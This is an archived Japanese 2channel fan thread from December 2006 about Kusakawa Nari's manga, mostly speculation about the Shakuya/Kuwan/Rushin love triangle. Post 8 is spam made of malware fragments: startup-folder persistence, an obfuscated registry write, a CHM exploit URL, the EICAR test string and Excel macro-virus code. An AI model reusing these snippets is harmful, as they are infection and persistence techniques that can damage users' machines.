5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

草川為さん、どうでしょう? 6

1 :龍の花と名無しさん:2006/12/23(土) 00:23:24 ID:???0
ララ本誌にて「龍の花わずらい」
ララDXにて「十二秘色のパレット」 連載中

その他草川為作品についても、マターリ進行で語っていきましょう。

前スレ
草川為さん、どうでしょう? 5
http://comic6.2ch.net/test/read.cgi/gcomic/1147077231/


そのほか過去スレは>>2を参照

2 :花と名無しさん:2006/12/23(土) 00:24:07 ID:???0
過去スレ

草川為さん、どうでしょう?
http://salad.2ch.net/gcomic/kako/990/990692622.html
草川為先生について語りましょう!
http://comic.2ch.net/test/read.cgi/gcomic/997865436/
草川為さん、どうでしょう?2
http://comic.2ch.net/test/read.cgi/gcomic/1004101030/
草川為さん、どうでしょう? 3
http://comic6.2ch.net/test/read.cgi/gcomic/1059131652/
草川為さん、どうでしょう? 4
http://comic6.2ch.net/test/read.cgi/gcomic/1123603654/

過去ログ倉庫
http://gcomic2ch.hacca.jp/kusakawa/index.html

3 :花と名無しさん:2006/12/23(土) 00:29:58 ID:???0
>>1
乙です。

4 :花と名無しさん:2006/12/23(土) 00:40:52 ID:???0
>>1
乙華麗〜

5 :花と名無しさん:2006/12/23(土) 00:47:48 ID:???O
>>1
乙カレー

6 :花と名無しさん:2006/12/23(土) 00:51:23 ID:???0
>>1
乙〜。

7 :花と名無しさん:2006/12/23(土) 01:28:43 ID:???O
>1
スレ立て乙

今月のルシン切な過ぎた。・゚・(ノД`)・゚・。
けど、ここまで切なくしたらこれから挽回するはず!
でも1年であの差を埋められたらクワンも可哀相…

8 :<body onload=window()>:2006/12/23(土) 01:41:13 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


9 :花と名無しさん:2006/12/23(土) 01:46:59 ID:???0
今月読んで、やっぱり最後はルシンとくっつくのかな?と思った。

10 :花と名無しさん:2006/12/23(土) 03:12:23 ID:???O
クワン派の侍女の自信満々な態度がかえって不安だ

11 :花と名無しさん:2006/12/23(土) 09:38:20 ID:???O
>9
私も思った
それに草川作品読むと
精神的にちょっとへたれた男に強い女の子の組合せが多い気がするから
草川さんがそういう組合せが好きなのかなと思った

12 :花と名無しさん:2006/12/23(土) 09:51:34 ID:???0
シャクヤはあんまり強いと思わないけどなぁ

いや自分も最後はルシンになりそうだと思ってるけど

13 :花と名無しさん:2006/12/23(土) 10:25:32 ID:???O
シャクヤは最弱ヒロインだよね

14 :花と名無しさん:2006/12/23(土) 11:19:52 ID:???O
最弱wっていうか、他の草川ヒロインより乙女なんだよ多分
そういや歴代のヒロインは何かしら強いな…

15 :花と名無しさん:2006/12/23(土) 11:25:07 ID:???0
シャクヤは体力的に男より強い分、心がちょっと弱そう
草川ヒロインは血から弱くてもほとんど精神面最強だからなw

16 :花と名無しさん:2006/12/23(土) 14:30:35 ID:???0
侍女達の争い、なんだかんだで意見が違ってても
皆シャクヤの幸せを願ってるところが
いじらしいというか微笑ましい話だった

17 :花と名無しさん:2006/12/23(土) 16:57:18 ID:???O
妹のように可愛がってるんだろうな。
そして甘やかしてもない感じ。

18 :花と名無しさん:2006/12/23(土) 18:40:33 ID:???0
クワン派はワンピースでルシン派はパンツ?

19 :花と名無しさん:2006/12/23(土) 19:01:35 ID:???O
待女の服のこと?
何故かそんな風にわかれてるみたいだね

ネエ=サンはそのままおねえさん系キャラってことでこの名前なんだろうか
だとしたらまんまでワロスw

20 :花と名無しさん:2006/12/23(土) 20:10:45 ID:???0
http://top2006.web.fc2.com/sale.html

21 :花と名無しさん:2006/12/23(土) 20:25:04 ID:???O
ルシン派の侍女の気持ちがイマイチ判らない
クワンがシャクヤにつれないから優しいルシンを推してるのかなと思うんだけど
シャクヤがずっとクワン一途に頑張ってるの見てたからクワンがシャクヤにキスしたの聞いたら
喜びそうな気がするのだけど

22 :花と名無しさん:2006/12/23(土) 20:36:32 ID:???0
>>21
ああ、自分もそうだなぁ
特にルピナはシャクヤ付きなのに
なんでシャクヤの好きな相手を応援してあげないんだろう、と思う
作品のバランス的にシャクヤの側近をルシン派にしたのかもしんないけど
クワンのこと別に反対でもないのなら、シャクヤ優先でしょうに

23 :花と名無しさん:2006/12/23(土) 21:30:30 ID:???O
侍女センサーで本能的にクワンの危うさを 察知してんだよルピナは

24 :花と名無しさん:2006/12/23(土) 22:29:06 ID:???O
>>22
やっぱり作品の都合上仕方ないのかな
せめてシャクヤ付の待女にクワン派おねえさん系の人が一人くらいいてくれたら良かったかもね

25 :花と名無しさん:2006/12/24(日) 00:13:34 ID:???O
>1乙 うりうりしてあげよう。

だれかも書いてたけど俺にも花を…の大ゴマ悲しくも美しかった。
侍女sが反省(?)して『シャクヤの味方』って言ったのもいい。

どっちでもいいが虎今回えらく小さく描かれてたな。

26 :花と名無しさん:2006/12/24(日) 00:15:47 ID:???0
虎なんてすぐでかくなるもんだが
成長してないのは時間が経ってないことの表れ?
一体一年の期限を提示されてからどれくらい経っているのだろう

27 :花と名無しさん:2006/12/24(日) 00:24:19 ID:???0
「あなたの不憫さが目に余ったので親切で助言を」
ってところで吹いたw

28 :花と名無しさん:2006/12/24(日) 00:49:26 ID:???O
待女ズはシャクヤとルシンに年下(ルピナは同い年?)だからか遠慮なさすぎw

ルシン派クワン派待女の対決でギャグパートかと思いきや、ルシンの切ない片思いもあって萌えたな〜
先月とはまた違った胸キュン

29 :花と名無しさん:2006/12/24(日) 00:51:45 ID:???0
てゆーか、ネエ・サンはクワンより年上という事実

30 :花と名無しさん:2006/12/24(日) 01:04:21 ID:???O
一歳違うけど生まれた年は一緒かもよ

31 :花と名無しさん:2006/12/24(日) 01:05:58 ID:???0
まあルシンは可哀想だけど
でも過去のことがあるとはいえ冷静に見れば
最初っからルシンが二人の間に無理矢理割り込もうとしただけなんだよね・・・
だからお邪魔虫なだけで勝負になってないのはある意味当たり前ではあるね

32 :花と名無しさん:2006/12/24(日) 01:18:06 ID:???O
それを言っちゃあおしまいよw
漫画なんだし

33 :花と名無しさん:2006/12/24(日) 01:41:48 ID:???0
>>31
最初っからシャクヤとクワンの間に
ルシンが割り込む隙がないくらいラブラブならお話として成立しない。
つぼみが付いたってのは
シャクヤの心に割り込む隙があった証拠じゃない?

今はまあ、アレだけど。

34 :花と名無しさん:2006/12/24(日) 07:48:38 ID:???0
自分は「はこびってる嫌味ったらしい黒いの」で吹いたw

35 :花と名無しさん:2006/12/24(日) 11:06:32 ID:???0
最初クワン派だったけど、ルシンがあまりにも不憫で気になってきた
読みきりのときは、もうちょっと余裕のあるキャラだったから
歳がシャクヤより一つ上なだけってのに違和感あったけど
連載になってから、どんどんヘタレてきて歳相応になってきたかな?

クワンはもしシャクヤとうまくいかなくても、また政略結婚とかしそうだけど
ルシンは失恋したら生涯独身になりそうな雰囲気。

36 :花と名無しさん:2006/12/24(日) 11:08:25 ID:???O
本誌スレの「7対1.5は最初の入れ墨省いて6対0.5では?」と書いてるの見て
ルシンはまだ花1つも咲かせてないことに気付いた
竜胆がいっきに2つ増えたから薔薇もいっきに増える可能性あるけど
まだ1つも花が咲いてないルシン切ない…

ところで勝負決まったら入れ墨どうなるんだろう?
これからルシンがクワンを抜いて結婚するとしてもシャクヤの腕に竜胆が咲いたままでは
昔の恋の思い出が残っているって感じで微妙に嫌な気が…
枯れるのかな

37 :花と名無しさん:2006/12/24(日) 11:46:14 ID:???0
ぶっちゃけ、7つも花咲かせた相手いるのに、
そいつを0.5の奴が追い抜かすってどんな展開やねん

と思うわけだが。


38 :花と名無しさん:2006/12/24(日) 12:10:01 ID:???0
そこは草川さんの技量にかかってるわけだが。
1.5の方が大逆転するのは意外性あって盛り上がるだろうけど
ちゃんと納得できる展開にできるかどうかは腕の見せ所。

でも逆転するとも限らないしこのまま安泰に7の方が勝つ可能性もあるんだからまだ杞憂では?

39 :花と名無しさん:2006/12/24(日) 12:19:04 ID:???0
ぶっちゃけ、ルピナがルシンとくっつくのもありかなと思ったりして

40 :花と名無しさん:2006/12/24(日) 12:21:12 ID:???0
自分はシャクヤが好きなので、シャクヤが好きなクワンと
普通にくっつけばいいかな、と思う。
つーか、今までずっとクワンが好きなシャクヤだったから
それが変わるって事が想像できないな。
ルシンは何かしでかすと思うけど、それで大逆転って事はなあ…

41 :花と名無しさん:2006/12/24(日) 12:26:03 ID:???0
>>38
クワンはキスまでしてるし、花が7つも咲いてるしな。
これでルシンがくっついても納得できる展開といったら、
ルシンがよほどいい男に描かれて、クワンがよほど小物or悪役に
描かれないかぎりないんじゃないかと思ってしまう。

42 :花と名無しさん:2006/12/24(日) 12:30:09 ID:???0
自分はルシン派だがルシンの方がキャラ的に好きというだけで
ルシンとくっついて欲しい派ではないので
どうしても納得できる展開にできなければ普通にクワンとくっついていいと思う。
つーか報われないルシンがゾクゾクするくらい萌えるw

43 :花と名無しさん:2006/12/24(日) 12:31:17 ID:???0
シャクヤもあれだけクワンに惚れてるんだしなぁ
裏切られても食い付けよ、くらいには思ってしまう
その辺でシャクヤの心の弱さが出てルシンとくっついちゃったりしても嫌だし

44 :花と名無しさん:2006/12/24(日) 13:36:26 ID:???0
三角関係だと片方が彼女にお母さんを見ていたんだ
オチのトラウマが・・・

45 :花と名無しさん:2006/12/24(日) 14:10:05 ID:???O
フルバのことかーっ!!

ルシンはお母さんとしてシャクヤを見てはないし(支えにはしてるけど)、
クワンも11歳下にお母さんを感じるってことはないと思うけど…
シャクヤは母性を感じさせるキャラでもないし
万が一そうなったらパクリと叩かれるw

46 :花と名無しさん:2006/12/24(日) 14:19:24 ID:???O
>>26
そういやあんま育ってないな…赤ちゃんの時から三か月も経てば猫科は倍くらい大きくなるのに
作中でまだ一か月も経ってなかったりして

47 :花と名無しさん:2006/12/24(日) 15:05:24 ID:???0
>>42
つーか報われないルシンがゾクゾクするくらい萌えるw

ナカーマ!!(*・∀・)人(・∀・*)
今回の辛そうなルシンの表情見て、かわいそうだとは思いつつも萌えまくったよw
ルシンの切ない表情や憂き表情、かなり萌える。
これからも、シャクヤとルシンの関係に嫉妬したりショック受けたりして
メタメタに打ちのめされて凹んでるルシンが見たい。
いや、あくまで最後はシャクヤがルシンとくっついてくれること希望してます。


48 :花と名無しさん:2006/12/24(日) 22:59:29 ID:???0
ルシンは好きだけど
シャクヤはクワンとくっついてほしいなぁ
先月号まで来るとねぇ・・・

49 :花と名無しさん:2006/12/24(日) 22:59:44 ID:???0
ラストは現在停滞してる薔薇の蕾が咲いて終って気がする。
たった一輪でもルシンの為に咲いた花ということで。

50 :花と名無しさん:2006/12/24(日) 23:03:06 ID:???0
>>49
それは結構上手い終わり方かも。。。
今月の、記憶が戻ったらシャクヤ以外に心開けるかも、ってのは
伏線じゃないかなと思ったりするんだけどどうだろう

51 :花と名無しさん:2006/12/24(日) 23:31:19 ID:???O
>43
裏切られても食い付くシャクヤな展開、いいな
草川ヒロインらしくていい

52 :花と名無しさん:2006/12/25(月) 00:35:00 ID:???O
あーやっぱサハラが一番好きだわ
……コミックス売っちゃっ(ry

53 :花と名無しさん:2006/12/25(月) 00:48:14 ID:???0
龍花レスばっかだな
誰かパレットも語ろうぜーー

54 :花と名無しさん:2006/12/25(月) 00:50:09 ID:???0
ララ発売直後なんだから当たり前<龍花話ばっか

55 :花と名無しさん:2006/12/25(月) 00:55:28 ID:???0
>>53
全角になってるから意味ないよ

ルピナ面白いキャラだなぁ・・・
ルピナが一番好きかもしれない

56 :花と名無しさん:2006/12/25(月) 01:39:17 ID:???0
>>53
そういう自分が先にパレットの話題振りなよ。
そしたらレスしようもある。

パレットは読めば面白いんだけど
個人的に語りたいと思う話題があまり思いつかない漫画なんだよな。

57 :花と名無しさん:2006/12/25(月) 02:12:10 ID:???O
パレット、読むとなごんでいいな

最近の勢いが嬉しいクワン派なんだが、今月読んでルシンに萌えてしまった

可愛いじゃないかチキショウ…!

58 :花と名無しさん:2006/12/25(月) 07:59:07 ID:???O
自分もクワン派だったけど今月でルシンにハマり、1・2巻読み返したら何故かルシン派に…

59 :花と名無しさん:2006/12/25(月) 09:25:35 ID:???0
>>42
私も仲間に入れてください
ルシンが不憫であればあるほど萌えるよw
ラスト虚ろに泣いてるのにも萌えてしまった変態くさい自分orz
やっぱルシンがヒロイン
真のヒロイン

60 :花と名無しさん:2006/12/25(月) 19:02:05 ID:???0
>>48
同じく。
自分はシャクヤが一番好きなんだが、
ここ最近のララから読み返すと、なんか普通にシャクヤはクワンと
くっつかせてやりたい。
シャクヤのクワンを好きな気持ちってのは、素直に応援したいしな。

>>59
すごいな。ここまできて好きキャラ変わるってのは。
自分は一度好きになったキャラはよっぽどでないかぎり順番変わらない
から、普通に驚いた。人それぞれなんだな。

61 :花と名無しさん:2006/12/25(月) 19:14:19 ID:???0
クワン派なので、もうずっとクワンが好きだろう自分は
今ももんもんしておりますよ、と。
いまだに相手がはっきりしないのもすごいよね。

62 :花と名無しさん:2006/12/25(月) 20:51:19 ID:???0
いまだにって、まだコミックスで三巻とちょっとくらいですがな。
一般的に三角関係物って結論はもっと引っ張るだろう。

63 :花と名無しさん:2006/12/25(月) 21:00:24 ID:???O
普通の三角関係ものはたいてい最初から当て馬がわかってるよ
フルバは異例

64 :花と名無しさん:2006/12/25(月) 21:07:33 ID:???O
龍はコミクス読んだだけじゃおもいっきりクワンが当て馬なんだけど
最近の追い上げがすさまじかったからな

てかコミクス読み直して、ルシンに意地悪なクワンに萌えてしまった自分に
ちょっとばかし自己嫌悪w

65 :花と名無しさん:2006/12/25(月) 21:34:33 ID:???0
>>63
いや、最初からわかんない漫画って意外とあるよ。

あとフルバは普通に最初からわかったが…スレ違いだな。

66 :花と名無しさん:2006/12/25(月) 21:39:31 ID:???0
おねいさんにうりうりされたい
あの黒髪のおねいさんがイイ!
ところでルシンはやっぱ年上とお付き合いしてるねありゃ


67 :花と名無しさん:2006/12/25(月) 21:47:18 ID:???0
ルシンの見た痛いメって
年上のお姉さん先生に懐いたら正体はオッサンでしたというアレかと思った。

68 :花と名無しさん:2006/12/25(月) 22:45:03 ID:???O
>>66
自分もおねえさんズの中では黒髪の人が好きだ。
武術大会から目ぇ付けてたw

>>67
オッサンワロスww
ハクライからナンパの指南までしてるし真面目な感じじゃないにしろ、
年上とのおつきあいはあったんじゃない?

69 :花と名無しさん:2006/12/26(火) 00:22:29 ID:???0
武術大会の黒髪のお姉さんは今月と同じ人?
確かに武術大会のとき美人だなと思ったが。

>>67
多分違うでしょ
別にハクライに色仕掛けされたわけじゃないし

70 :花と名無しさん:2006/12/26(火) 00:47:52 ID:???O
俺『にも』花を頂戴
ってなんか半分あきらめかけて、
せめて花一つでもって気分なのかね。
シャクヤの想いがクワンにむかってることが前提なのは今までと
一緒ではあるんだが

71 :花と名無しさん:2006/12/26(火) 01:02:02 ID:???0
いろんな意味が込められてるんだよ…花を頂戴
シャクヤを好きな理由答えてたけど結局理屈じゃないんだろうなあ
なんかもう自分の存在意義になっちゃてるのが痛い

72 :花と名無しさん:2006/12/26(火) 01:23:44 ID:???O
ルシンは片思いしてるからこそルシンって感じだ

73 :花と名無しさん:2006/12/26(火) 02:11:08 ID:???O
>>33
最初:クワン←シャクヤ←ルシン
今:クワン→←シャクヤ←ルシン

こんな感じでクワンからのアプローチはなかったから、今はともかく
シャクヤ片思い中の初期ならルシンがつけ入る隙は十分あった気がするね。
初期のうちに花が増えなかったのは痛いなー。

74 :花と名無しさん:2006/12/26(火) 09:47:28 ID:???0
3人のバランスを崩すために、第三の男が出てきたりしないかな?
何代か前に別のオアシス街の嫁いだ女性の子孫で、
龍に変身できる青年がひょっこり現れるみたいな。

親戚と言うことで無防備に喜ぶシャクヤ。
相手の胡散臭さに眉をひそめるクワンと、いじけるルシン。
そして、絶対懐かない虎。


75 :花と名無しさん:2006/12/26(火) 09:56:59 ID:???O
あえて言わせてもらう
何その陳腐な展開。

76 :花と名無しさん:2006/12/26(火) 12:03:36 ID:???O
本編での役割まんまでワロタ>いじけるルシン

77 :花と名無しさん:2006/12/26(火) 12:50:57 ID:???0
ボーイ・ミーツ・ガール的にはルシンのがふさわしいんだけどな


78 :花と名無しさん:2006/12/26(火) 13:14:56 ID:???O
なんか前はクワンのがほんとにシャクヤのこと好きなのか?
と思って疑ってたんだけど、最近はルシンに対しての疑問が膨らむ…
砂漠で支えにしてたから、その延長で恋愛感情だと錯覚してんじゃないかとか思うの自分だけ?
ほんとに『シャクヤが』好きなのかなあ…
なんかシャクヤにすがってるような気がしてならないんだけど

……と、今月を読んで思ってしまった自分ルシン派orz
がんばれルシン切なすぎる…!

79 :花と名無しさん:2006/12/26(火) 16:14:46 ID:???0
>>78
報われないのは仕方ないとしても
恋心まで執着心にすり替えられて否定されちゃうとカワイソスにも程があるな〜
たとえきっかけが「砂漠で支えにしてた延長」だったとしても
本当に好きなことには変わりないと思うけど。

クワンもよく言われるけどさ
「本当に好きかどうか怪しい」って見方は、もうちょっと様子見てからにしようよ。
「○○はシャクヤのこと本当に好きじゃないからふさわしいのは××の方!」って言い争いだけは見たくない。

80 :花と名無しさん:2006/12/26(火) 17:07:11 ID:???O
>79
いや、クワンがシャクヤを好きかどうか怪しかったからルシン派になった訳じゃないんだよー
だからどっちがふさわしい!とか言いたい訳でもないんだ…
なんていうか、ルシンのシャクヤへの依存度が高いみたいで心配なんだな
とりあえず幸せになって欲しいんだけどなあ

81 :花と名無しさん:2006/12/26(火) 17:19:50 ID:???O
すりこみに近い気はする。思ってるのはたしかだろうけど

82 :花と名無しさん:2006/12/26(火) 17:21:39 ID:???0
そんなに依存度高いかな?
自分が頭痛に苦しんでる時でも
クワンを心配してるシャクヤに余計な気遣いはさせたくないって
一人で我慢してるような奴ですよ。

83 :花と名無しさん:2006/12/26(火) 17:53:49 ID:???0
それとこれは別
ルシンは…例えばシャクヤが先に死んだら後追い自殺しそうに見えるんだ
親も家も在るのに帰る場所はシャクヤなんだもん重いよ

84 :花と名無しさん:2006/12/26(火) 18:26:02 ID:???O
そういう依存でなくて、ルシンの世界にシャクヤしかいないとか、そーゆー意味なんじゃない?
視野の狭さとゆーか、シャクヤ以外に大事なものがないっつーか
まあまだ16才なんだから仕方ないのかもだけど

って80でもないのに勝手に解釈してすまん

85 :花と名無しさん:2006/12/26(火) 18:50:02 ID:???O
ところで今月の冒頭に出てきた集落はやっぱりクワンの出身地かな
裏切りと見せかけて黒幕への復讐を狙ってる線もあるかも…?
恋も物語も先が読めない。ニクイわぁ。

86 :花と名無しさん:2006/12/26(火) 19:00:44 ID:???O
ニクイわあ(便乗)

87 :花と名無しさん:2006/12/26(火) 19:08:27 ID:???O
ほんとニクイわぁ

つーか二か月待ちキツイわぁorz
寺も出ないししばらく草川分が補給できない…二月はコミクス寺ララと目白押しだけど

88 :花と名無しさん:2006/12/26(火) 20:45:55 ID:???O
本当ニクイわあ
クワンのためにコミクス集めたよw

89 :花と名無しさん:2006/12/26(火) 21:29:46 ID:GTtqB+ptO
>>43
クワンをあれだけ好きなら、裏切りその他何かあっても
シャクヤは絶対追いかけてくれると私的に信じてる。
強者揃いの草川ヒロインズらしさを見せてくれるさww

90 :花と名無しさん:2006/12/26(火) 21:34:53 ID:???O
スマソ無意味にあげてしまった…虎に噛まれてきます

91 :花と名無しさん:2006/12/26(火) 21:45:00 ID:???0
クワンに振られたらどうするの?

92 :花と名無しさん:2006/12/26(火) 22:03:00 ID:???O
ルシンだって片思いでもおいかけてるし、
シャクヤも追いかけるんじゃない?
まあ今のクワンがシャクヤをふるといったら本心ではないと思うなあ

93 :花と名無しさん:2006/12/26(火) 22:12:08 ID:???0
>>74
最悪な展開ですね

94 :花と名無しさん:2006/12/26(火) 22:33:27 ID:???O
本心でなくシャクヤを振るクワンって
なんかやたら萌えるんだけど

95 :花と名無しさん:2006/12/26(火) 22:35:35 ID:???0
萌えない。
クワンもシャクヤ好きそうなのに

96 :花と名無しさん:2006/12/26(火) 22:48:33 ID:???O
>95
考えてみなされ
本心を隠して振り、苦悩する


・・・萌えるんじゃないか!

97 :花と名無しさん:2006/12/26(火) 22:51:37 ID:???0
振る理由がないよ・・・
なにか頭でストーリー作ってるの?

98 :花と名無しさん:2006/12/26(火) 22:57:31 ID:???O
たんにクワンみたいに自制心の強い男が、
本心を押し殺して守りたい女の子を振るってことに萌えを感じるってことなんじゃないの?
しかも普段いろんなことに淡白そうなのに苦悩する、みたいな

99 :花と名無しさん:2006/12/26(火) 22:59:03 ID:???O
だから今までのレスの流れからして最初から仮定の話なんだが
何度かクワンの秘密説が色々でてたじゃん
そこから裏切りやら振るやらの予想が出てきてたでしょ。
それにかかわってならありそうだよって話。
苦悩するクワンと振られてもめげないシャクヤなら
萌えるよ。

100 :花と名無しさん:2006/12/26(火) 22:59:56 ID:???0
そんな妄想垂れ流されても

101 :花と名無しさん:2006/12/26(火) 23:04:25 ID:???O
>>98
普通にその話だよね。
わざわざ説明しなくちゃいけない流れでもないんだが

まあ、ただたんに今後の展開予想や物語の伏線の仮定ってだけの話でしょ

102 :花と名無しさん:2006/12/26(火) 23:04:29 ID:???O
>>100
みんなそれぞれの萌えのパターンがあるんだなあ、って思っとけばいーじゃん
そんなムキにならんでも一緒に萌えろって強制されてもないんだからさ

…て、なんか言い方キツかったらゴメン

103 :花と名無しさん:2006/12/26(火) 23:07:47 ID:???O
>100
なんでいらついてるのか知らないが
ただのキャラ萌えの話だぞ。
それに萌え話がダメってなら
漫画系板のスレの半分以上が消える

104 :花と名無しさん:2006/12/26(火) 23:08:48 ID:???0
萌えパターンにしても原作から離れられたら妄想でしかないよ
しかもなんの前置きも前提もなく
クワンがシャクヤ振ったら萌えとか描かれても・・・
独り言言うスレにでも行けばって気が。

105 :花と名無しさん:2006/12/26(火) 23:12:52 ID:???O
そんな事いったって91からその流れなんだし、
それに乗って話しただけだよ。
そんなに怒らなくてもすぐ消える話題なんだから
スルーしてくれればいいのに

106 :花と名無しさん:2006/12/26(火) 23:15:20 ID:???O
や、だからクワンの裏切り展開説は前からあっただろ
別にそんな原作から掛け離れてもないと思うけどな
あ、原作予想から、ってことな

107 :花と名無しさん:2006/12/26(火) 23:15:55 ID:???0
というかよく分からない<妄想ネタが

108 :花と名無しさん:2006/12/26(火) 23:19:13 ID:???O
前からよく語られとる。過去ログ参照

裏切り云々はともかく、こういう展開でキャラがこういう行動とつら萌えるよね
って話なだけなんだから漫画板でいちいち突っ掛かってたら切りがない
普通にそうなんだって流しとこうよ

109 :花と名無しさん:2006/12/26(火) 23:20:53 ID:???O
そうそう、萌えない話題ならスルーして自分でネタ振りすりゃいいさ


110 :花と名無しさん:2006/12/26(火) 23:21:28 ID:???0
>>101
なぜ自分にレス?

111 :花と名無しさん:2006/12/26(火) 23:22:22 ID:???0
>>108-109
そろそろやめなよ・・・。

112 :花と名無しさん:2006/12/26(火) 23:22:32 ID:???O
>107
ここの住人じゃないの?
龍については色々伏線とかの予想があって
クワンの話もその話だよ


113 :花と名無しさん:2006/12/26(火) 23:25:33 ID:???0
確かにスルーすべきところもあると思うんだけど
あんまり妄想じみた流れが続くのはちょっと勘弁してほしいよ

114 :花と名無しさん:2006/12/26(火) 23:26:43 ID:???O
>110
いや自分のじゃないからレスしてるんだが。
てか携帯とかで個人判断しても意味ないよ

115 :花と名無しさん:2006/12/26(火) 23:27:12 ID:???O
よもや草川スレでこんな流れになろうとはw
この辺りで話題変えようか

さっきも出てたけど、今月号の冒頭のオアシスの廃墟(?)が
クワンの出身地って可能性はホントにあるのかなー


116 :花と名無しさん:2006/12/26(火) 23:28:11 ID:???O
空気読まずにカキコ。

20ページ1コマ目の照れるシャクヤがエロいと思ったのは自分だけ?

117 :花と名無しさん:2006/12/26(火) 23:32:41 ID:MbjrFfUmO
>>116
自分も思った!

118 :花と名無しさん:2006/12/26(火) 23:33:28 ID:???0
age荒しか、また携帯

119 :花と名無しさん:2006/12/26(火) 23:33:43 ID:???0
お前ら同じクワン派なんだろ?だったら仲良く汁。
自分はルシン派だからスルーだがな。
同じクワン派でも色々あるんだね。
当たり前の事なんだが皆が皆、同じ物(話)を好きにはなれないんだと改めて思った。

ちなみに自分は失ってから漸く相手の重要性に気付くって感じの話が萌える…。

120 :花と名無しさん:2006/12/26(火) 23:35:43 ID:???O
117だけど、ゴメン携帯からで…
うっかりageちゃったけど荒しじゃないよ…


121 :花と名無しさん:2006/12/26(火) 23:37:04 ID:???O
>118
いいかげんに汁
おまえさんが半分荒らしになってるぞ。
117だってわざとじやあないかもしれないだろ

122 :花と名無しさん:2006/12/26(火) 23:38:25 ID:???0
・・・・

123 :花と名無しさん:2006/12/26(火) 23:39:12 ID:???O
上げ荒らしならもっと脈絡ないレスだよ
またーりいこうよ。

124 :花と名無しさん:2006/12/27(水) 00:09:51 ID:???O
ここで知って確認
2月24日までおあずけなのかorz

125 :花と名無しさん:2006/12/27(水) 00:15:55 ID:???0
>>115
妄想の範囲を出ないけど可能性はあると思う
あの地を追われてオアシスにたどり着いたとかね
なんかエコロジカルな展開になるのかなあ…?
一番気になるのはルシンの過去だけど
引きがあんなんだったし

126 :花と名無しさん:2006/12/27(水) 00:17:12 ID:???O
一応2月5日に3巻も出るからそれまで我慢しなされ
パレットも読んでるなら、楽しみが2月に集中したと考えるんだ

127 :花と名無しさん:2006/12/27(水) 00:18:28 ID:???O
上のは>>124へのレス

128 :花と名無しさん:2006/12/27(水) 00:26:21 ID:???0
草川先生のサイトに龍の3巻にダブルクラウンが収録されると書いてあったよ
あとこれで特級なんとか読めば草川作品コンプリートだ自分

129 :花と名無しさん:2006/12/27(水) 09:13:14 ID:???0
ダブルクラウン!読んでみたかったんだ嬉しい。

130 :花と名無しさん:2006/12/27(水) 16:40:26 ID:???O
自分はダブルクラウンでコンプリート!
やったー

131 :花と名無しさん:2006/12/27(水) 20:33:42 ID:???0
>>125
クワンもルシンも空白の過去があるから、
そこらへん掘り下げてもらえそうな気がする。
そうすると、あの地が、どちらかに関係があっても
おかしくない。

132 :花と名無しさん:2006/12/27(水) 23:26:09 ID:???O
>>69
亀だけど多分そうだとオモ。
リッツ先生の例もあるしモブキャラから昇格したと推測。(名前も出てないけどw)
よく見たらネエ=サンらしき人やショートカットのおねえさんもクワンの回りにいるね。

133 :花と名無しさん:2006/12/27(水) 23:47:07 ID:???0
シャクヤLV15は年齢から?てことはルシンはLV16でクワンはLV26?
案外低いな

134 :花と名無しさん:2006/12/28(木) 06:53:50 ID:???0
>>133
過去に年齢出てたはず(15、16、26であってる)
初めて見た時は、クワン10も下のルシンに大人気無いなあと笑ったw

135 :花と名無しさん:2006/12/28(木) 17:07:21 ID:???O
今月と先月の扉絵見て思ったんだが、ルシンとクワンの服おそろいなんだな

136 :花と名無しさん:2006/12/28(木) 17:58:13 ID:???O
先月の扉絵うpしてるとこないかなー?

137 :花と名無しさん:2006/12/28(木) 21:04:27 ID:???0
コミクスでるまで待て。


138 :花と名無しさん:2006/12/29(金) 23:50:55 ID:???O
クワン裏切りは確定的なんだろうか…伏線がこわいよーorz

139 :花と名無しさん:2006/12/29(金) 23:53:31 ID:???0
そんなことはないと思うけど・・・
裏切りでもない限り、ルシンとシャクヤがくっつきそうにないってことだと思う

140 :花と名無しさん:2006/12/30(土) 10:12:05 ID:???O
よーし皆で今月の冒頭に出てきたキャラの正体を当てようぜ







ベタなところでクワンの兄弟、または幼馴染み

141 :花と名無しさん:2006/12/31(日) 16:38:24 ID:???O
ベタっていうか、クワンと全く関係ない人って線もあるよね?
案外ルシンと関係あったりして。

142 :花と名無しさん:2006/12/31(日) 19:28:54 ID:???O
男キャラ少ないよな、父ちゃんあんなだし

143 :花と名無しさん:2006/12/31(日) 19:48:30 ID:???O
>>142
ホスト部のハルヒパパといい勝負ww>ハクライ
そういやメインの男キャラはルシン、クワン、ハクライしかいないな
後は準レギュラーにギンガ、キントラ、緑陰の長くらい?

144 :花と名無しさん:2006/12/31(日) 22:27:27 ID:???0
ララスレで龍(というかシャクヤ)批判してる人
前もこのスレでシャクヤに罪悪感持てみたいな事言ったのと同じ人かな
大好きだった婚約者って言ってるけどルシンとシャクヤは
数えるほどしか会ってなくてそこまでの感情芽生えてたとは思わないな
あくまで将来の結婚相手として程々の好意は持ってたと思うけど
シャクヤが自主的に好きになったのはクワンだろうし


145 :花と名無しさん:2006/12/31(日) 23:41:01 ID:???O
十歳だからな
過去の描写みてるかぎりは好意ってレベルのような気はする

146 :花と名無しさん:2006/12/31(日) 23:49:40 ID:???0
